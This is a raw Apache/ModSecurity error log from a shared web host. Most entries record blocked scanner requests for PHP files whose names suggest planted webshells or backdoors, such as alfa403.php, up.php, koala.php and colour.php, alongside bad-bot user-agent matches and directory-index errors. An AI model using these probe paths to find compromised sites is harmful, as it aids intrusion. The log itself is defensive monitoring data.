[Tue May 26 15:17:43.276392 2026] [autoindex:error] [pid 700087:tid 700251] [client 106.215.159.27:0] AH01276: Cannot serve directory /home2/ucdccoin/public_html/upload/gallery/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://www.ucdc.co.in/gallery
[Tue May 26 15:17:43.330722 2026] [security2:error] [pid 700087:tid 700220] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVsPpPHQM4as9fEIIaTyQAAAAM"]
[Tue May 26 15:17:43.939189 2026] [security2:error] [pid 700087:tid 700239] [client 20.12.194.227:50657] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 227.194.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.dimensioncorporativa.com.co"] [uri "/alfa403.php"] [unique_id "ahVsP5PHQM4as9fEIIaT_gAAABY"]
[Tue May 26 15:17:43.939317 2026] [security2:error] [pid 700087:tid 700239] [client 20.12.194.227:50657] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.dimensioncorporativa.com.co"] [uri "/alfa403.php"] [unique_id "ahVsP5PHQM4as9fEIIaT_gAAABY"]
[Tue May 26 15:17:44.328395 2026] [security2:error] [pid 700087:tid 700259] [client 2.58.56.196:51051] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.56.58.2.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.cagmedya.com"] [uri "/wp-content/plugins/fix/up.php"] [unique_id "ahVsQJPHQM4as9fEIIaUCwAAACo"]
[Tue May 26 15:17:44.346849 2026] [security2:error] [pid 700087:tid 700265] [client 2.58.56.196:51044] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.56.58.2.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.cagmedya.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahVsQJPHQM4as9fEIIaUEAAAADA"], referer: www.google.com
[Tue May 26 15:17:44.352921 2026] [security2:error] [pid 700087:tid 700334] [client 2.58.56.196:51052] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.56.58.2.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.cagmedya.com"] [uri "/wp-plain.php"] [unique_id "ahVsQJPHQM4as9fEIIaUEwAAAHU"], referer: www.google.com
[Tue May 26 15:17:44.547093 2026] [security2:error] [pid 700087:tid 700222] [client 20.12.194.227:65466] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 227.194.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.dimensioncorporativa.com.co"] [uri "/test11.php"] [unique_id "ahVsQJPHQM4as9fEIIaUIQAAAAU"]
[Tue May 26 15:17:44.547190 2026] [security2:error] [pid 700087:tid 700222] [client 20.12.194.227:65466] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.dimensioncorporativa.com.co"] [uri "/test11.php"] [unique_id "ahVsQJPHQM4as9fEIIaUIQAAAAU"]
[Tue May 26 15:17:44.693334 2026] [security2:error] [pid 700087:tid 700342] [client 2.58.56.196:51045] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.cagmedya.com"] [uri "/index.php"] [unique_id "ahVsQJPHQM4as9fEIIaUDgAAAH0"], referer: www.google.com
[Tue May 26 15:17:44.966573 2026] [security2:error] [pid 700087:tid 700340] [client 2.58.56.196:57663] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.56.58.2.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.cagmedya.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahVsQJPHQM4as9fEIIaUNQAAAHs"], referer: www.google.com
[Tue May 26 15:17:45.318784 2026] [security2:error] [pid 700087:tid 700232] [client 20.12.194.227:35939] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 227.194.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.dimensioncorporativa.com.co"] [uri "/koala.php"] [unique_id "ahVsQZPHQM4as9fEIIaUQgAAAA8"]
[Tue May 26 15:17:45.318924 2026] [security2:error] [pid 700087:tid 700232] [client 20.12.194.227:35939] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.dimensioncorporativa.com.co"] [uri "/koala.php"] [unique_id "ahVsQZPHQM4as9fEIIaUQgAAAA8"]
[Tue May 26 15:17:45.331647 2026] [security2:error] [pid 700087:tid 700289] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVsQJPHQM4as9fEIIaUMQAAAEg"]
[Tue May 26 15:17:45.632289 2026] [security2:error] [pid 700087:tid 700218] [client 2.58.56.196:51045] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.cagmedya.com"] [uri "/index.php"] [unique_id "ahVsQZPHQM4as9fEIIaUQQAAAAE"], referer: www.google.com
[Tue May 26 15:17:45.639346 2026] [security2:error] [pid 700087:tid 700265] [client 2.58.56.196:51046] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.56.58.2.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.cagmedya.com"] [uri "/uurlyhou.php"] [unique_id "ahVsQZPHQM4as9fEIIaUTgAAADA"], referer: www.google.com
[Tue May 26 15:17:45.926934 2026] [security2:error] [pid 700087:tid 700306] [client 2.58.56.196:58305] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.56.58.2.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.cagmedya.com"] [uri "/wp-content/plugins/apikey/apikey.php"] [unique_id "ahVsQZPHQM4as9fEIIaUVgAAAFk"]
[Tue May 26 15:17:46.077125 2026] [security2:error] [pid 700087:tid 700285] [client 216.244.66.241:55812] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.ghanemgh.com"] [uri "/concubinalabab/beadce1000672.shtml"] [unique_id "ahVsQpPHQM4as9fEIIaUXAAAAEQ"]
[Tue May 26 15:17:46.077231 2026] [security2:error] [pid 700087:tid 700285] [client 216.244.66.241:55812] ModSecurity: Warning. Matched phrase "Dotbot" at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.ghanemgh.com"] [uri "/concubinalabab/beadce1000672.shtml"] [unique_id "ahVsQpPHQM4as9fEIIaUXAAAAEQ"]
[Tue May 26 15:17:46.205002 2026] [security2:error] [pid 700087:tid 700223] [client 20.12.194.227:35305] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 227.194.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.dimensioncorporativa.com.co"] [uri "/mac.php"] [unique_id "ahVsQpPHQM4as9fEIIaUZwAAAAY"]
[Tue May 26 15:17:46.205095 2026] [security2:error] [pid 700087:tid 700223] [client 20.12.194.227:35305] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.dimensioncorporativa.com.co"] [uri "/mac.php"] [unique_id "ahVsQpPHQM4as9fEIIaUZwAAAAY"]
[Tue May 26 15:17:46.902561 2026] [security2:error] [pid 700087:tid 700257] [client 2.58.56.196:61029] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.56.58.2.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.cagmedya.com"] [uri "/wp-plain.php"] [unique_id "ahVsQpPHQM4as9fEIIaUfwAAACg"], referer: www.google.com
[Tue May 26 15:17:47.084888 2026] [security2:error] [pid 700087:tid 700341] [client 20.12.194.227:33429] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 227.194.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.dimensioncorporativa.com.co"] [uri "/25d653587fdfd1.php"] [unique_id "ahVsQ5PHQM4as9fEIIaUgwAAAHw"]
[Tue May 26 15:17:47.085027 2026] [security2:error] [pid 700087:tid 700341] [client 20.12.194.227:33429] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.dimensioncorporativa.com.co"] [uri "/25d653587fdfd1.php"] [unique_id "ahVsQ5PHQM4as9fEIIaUgwAAAHw"]
[Tue May 26 15:17:47.177147 2026] [security2:error] [pid 700087:tid 700295] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVsQpPHQM4as9fEIIaUdQAAAE4"]
[Tue May 26 15:17:47.308031 2026] [security2:error] [pid 700087:tid 700242] [client 106.51.108.178:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "xllent.in"] [uri "/index.php"] [unique_id "ahVsQpPHQM4as9fEIIaUcgAAABk"]
[Tue May 26 15:17:47.526790 2026] [security2:error] [pid 700087:tid 700271] [client 2.58.56.196:62961] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.56.58.2.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.cagmedya.com"] [uri "/plugins/content/apismtp/apismtp.php"] [unique_id "ahVsQ5PHQM4as9fEIIaUjwAAADY"]
[Tue May 26 15:17:47.969936 2026] [security2:error] [pid 700087:tid 700337] [client 2.58.56.196:55963] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.56.58.2.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.cagmedya.com"] [uri "/csdgouay.php"] [unique_id "ahVsQ5PHQM4as9fEIIaUogAAAHg"], referer: www.google.com
[Tue May 26 15:17:48.337539 2026] [security2:error] [pid 700087:tid 700312] [client 2.58.56.196:62993] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.56.58.2.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.cagmedya.com"] [uri "/wp-content/plugins/apikey/apikey.php.suspected"] [unique_id "ahVsRJPHQM4as9fEIIaUsAAAAF8"]
[Tue May 26 15:17:49.285160 2026] [security2:error] [pid 700087:tid 700271] [client 2.58.56.196:57850] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.56.58.2.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.cagmedya.com"] [uri "/plugins/content/apismtp/apismtp.php.suspected"] [unique_id "ahVsRZPHQM4as9fEIIaU0QAAADY"]
[Tue May 26 15:17:49.476838 2026] [security2:error] [pid 700087:tid 700161] [remote 216.73.217.110:64778] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 110.217.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rainadelproperties.com"] [uri "/online.php"] [unique_id "ahVsRZPHQM4as9fEIIaU1gAAQ0k"]
[Tue May 26 15:17:49.961560 2026] [security2:error] [pid 700087:tid 700225] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVsRZPHQM4as9fEIIaU2QAAAAg"]
[Tue May 26 15:17:50.023977 2026] [security2:error] [pid 700087:tid 700272] [client 216.244.66.241:55822] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.ghanemgh.com"] [uri "/hulsterbfdc/cddacd2333845.shtml"] [unique_id "ahVsRpPHQM4as9fEIIaU7gAAADc"]
[Tue May 26 15:17:50.024078 2026] [security2:error] [pid 700087:tid 700272] [client 216.244.66.241:55822] ModSecurity: Warning. Matched phrase "Dotbot" at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.ghanemgh.com"] [uri "/hulsterbfdc/cddacd2333845.shtml"] [unique_id "ahVsRpPHQM4as9fEIIaU7gAAADc"]
[Tue May 26 15:17:50.531475 2026] [autoindex:error] [pid 700087:tid 700336] [client 5.255.121.183:0] AH01276: Cannot serve directory /home2/glorolle/public_html/gldmarsa.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 15:17:53.695729 2026] [security2:error] [pid 700087:tid 700285] [client 20.12.194.227:35308] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 227.194.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.dimensioncorporativa.com.co"] [uri "/wefile.php"] [unique_id "ahVsSZPHQM4as9fEIIaVggAAAEQ"]
[Tue May 26 15:17:53.695847 2026] [security2:error] [pid 700087:tid 700285] [client 20.12.194.227:35308] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.dimensioncorporativa.com.co"] [uri "/wefile.php"] [unique_id "ahVsSZPHQM4as9fEIIaVggAAAEQ"]
[Tue May 26 15:17:53.962294 2026] [security2:error] [pid 700087:tid 700220] [client 62.244.225.226:17379] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "cagmedya.com"] [uri "/index.php"] [unique_id "ahVsSZPHQM4as9fEIIaVhgAAAAM"]
[Tue May 26 15:17:54.139642 2026] [security2:error] [pid 700087:tid 700256] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVsSZPHQM4as9fEIIaVhQAAACc"]
[Tue May 26 15:17:55.232100 2026] [security2:error] [pid 700087:tid 700271] [client 20.12.194.227:35928] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 227.194.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.dimensioncorporativa.com.co"] [uri "/casp3.php"] [unique_id "ahVsS5PHQM4as9fEIIaVrwAAADY"]
[Tue May 26 15:17:55.232207 2026] [security2:error] [pid 700087:tid 700271] [client 20.12.194.227:35928] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.dimensioncorporativa.com.co"] [uri "/casp3.php"] [unique_id "ahVsS5PHQM4as9fEIIaVrwAAADY"]
[Tue May 26 15:17:56.670109 2026] [security2:error] [pid 700087:tid 700315] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVsTJPHQM4as9fEIIaV2wAAAGI"]
[Tue May 26 15:17:57.581386 2026] [security2:error] [pid 700087:tid 700269] [client 114.119.131.206:50655] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "haddingtonwines.com"] [uri "/cart"] [unique_id "ahVsTZPHQM4as9fEIIaWDgAAADQ"], referer: http://haddingtonwines.com/cart?remove_item=ee26fc66b1369c7625333bedafbfcaf6
[Tue May 26 15:17:58.293593 2026] [autoindex:error] [pid 700087:tid 700257] [client 20.12.194.227:53757] AH01276: Cannot serve directory /home2/jhonwy9v/dimensioncorporativa.com.co/wp-includes/blocks/post-comments-form/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 15:17:58.294245 2026] [security2:error] [pid 700087:tid 700257] [client 20.12.194.227:53757] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "mail.dimensioncorporativa.com.co"] [uri "/cgi-sys/403.html"] [unique_id "ahVsTpPHQM4as9fEIIaWKAAAACg"]
[Tue May 26 15:17:58.328919 2026] [security2:error] [pid 700087:tid 700344] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVsTZPHQM4as9fEIIaWFQAAAH8"]
[Tue May 26 15:17:58.574671 2026] [security2:error] [pid 700087:tid 700272] [client 58.11.30.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVsTpPHQM4as9fEIIaWJQAAADc"]
[Tue May 26 15:17:59.408307 2026] [autoindex:error] [pid 700087:tid 700280] [client 20.12.194.227:53757] AH01276: Cannot serve directory /home2/jhonwy9v/dimensioncorporativa.com.co/wp-admin/js/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 15:17:59.409001 2026] [security2:error] [pid 700087:tid 700280] [client 20.12.194.227:53757] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "mail.dimensioncorporativa.com.co"] [uri "/cgi-sys/403.html"] [unique_id "ahVsT5PHQM4as9fEIIaWWAAAAD8"]
[Tue May 26 15:17:59.703189 2026] [security2:error] [pid 700087:tid 700277] [client 20.12.194.227:53757] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 227.194.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.dimensioncorporativa.com.co"] [uri "/wp-admin/css/colour.php"] [unique_id "ahVsT5PHQM4as9fEIIaWYwAAADw"]
[Tue May 26 15:17:59.703321 2026] [security2:error] [pid 700087:tid 700277] [client 20.12.194.227:53757] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.dimensioncorporativa.com.co"] [uri "/wp-admin/css/colour.php"] [unique_id "ahVsT5PHQM4as9fEIIaWYwAAADw"]
[Tue May 26 15:17:59.924289 2026] [security2:error] [pid 700087:tid 700264] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVsT5PHQM4as9fEIIaWXwAAAC8"]
[Tue May 26 15:18:00.158574 2026] [security2:error] [pid 700087:tid 700267] [client 66.249.64.96:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahVsUJPHQM4as9fEIIaWeAAAADI"]
[Tue May 26 15:18:00.158925 2026] [security2:error] [pid 700087:tid 700233] [client 66.249.64.96:61530] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahVsUJPHQM4as9fEIIaWcQAAABA"]
[Tue May 26 15:18:00.366669 2026] [security2:error] [pid 700087:tid 700287] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVsT5PHQM4as9fEIIaWawAAAEY"]
[Tue May 26 15:18:01.567910 2026] [security2:error] [pid 700087:tid 700312] [client 92.204.248.55:29240] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 55.248.204.92.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.samayikprasanga.in"] [uri "/epaper.php"] [unique_id "ahVsUZPHQM4as9fEIIaWmwAAAF8"]
[Tue May 26 15:18:01.568014 2026] [security2:error] [pid 700087:tid 700312] [client 92.204.248.55:29240] ModSecurity: Warning. Matched phrase "ADmantX" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "409"] [hostname "www.samayikprasanga.in"] [uri "/epaper.php"] [unique_id "ahVsUZPHQM4as9fEIIaWmwAAAF8"]
[Tue May 26 15:18:01.658010 2026] [security2:error] [pid 700087:tid 700291] [client 114.119.136.245:54255] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "poonawallatennisacademy.com"] [uri "/portfolios/ibag"] [unique_id "ahVsUZPHQM4as9fEIIaWpAAAAEo"], referer: https://poonawallatennisacademy.com/portfolios/ibag
[Tue May 26 15:18:02.237010 2026] [fcgid:warn] [pid 700087:tid 700245] (70014)End of file found: [client 66.132.186.190:56568] mod_fcgid: can't get data from http client
[Tue May 26 15:18:02.405264 2026] [security2:error] [pid 700087:tid 700325] [client 20.12.194.227:56788] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 227.194.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.dimensioncorporativa.com.co"] [uri "/half.php"] [unique_id "ahVsUpPHQM4as9fEIIaWzQAAAGw"]
[Tue May 26 15:18:02.405385 2026] [security2:error] [pid 700087:tid 700325] [client 20.12.194.227:56788] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.dimensioncorporativa.com.co"] [uri "/half.php"] [unique_id "ahVsUpPHQM4as9fEIIaWzQAAAGw"]
